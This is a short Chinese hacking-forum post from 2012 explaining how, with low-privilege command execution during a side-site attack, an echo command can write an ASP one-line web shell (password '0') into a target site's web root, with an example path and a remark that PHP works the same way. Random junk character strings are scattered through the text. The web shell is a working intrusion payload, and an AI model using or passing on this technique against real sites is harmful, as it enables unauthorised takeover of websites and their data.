在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。+ S6 g+ p3 L! A! T/ w/ E
! @0 V( c4 S# v0 }, w. N
命令格式, `9 y4 t) ]. T3 d) H
$ T+ x! ?) e& i; u# u) R3 _
Echo 语句 >目标站绝对目录9 Q9 f. ?, p( S0 x# P
' D$ |. g5 L# W8 E6 v例如: , b- G3 [8 F2 q" k9 _" i ~
6 Z* } g" }2 o* F8 j
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
$ s( u1 n% e* j# G0 ^. ~& ]. F% f0 s1 c3 n& [$ _! d
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。% B2 J2 S- ]" I
|
发表于 2012-9-23 14:40:24
收藏
支持
反对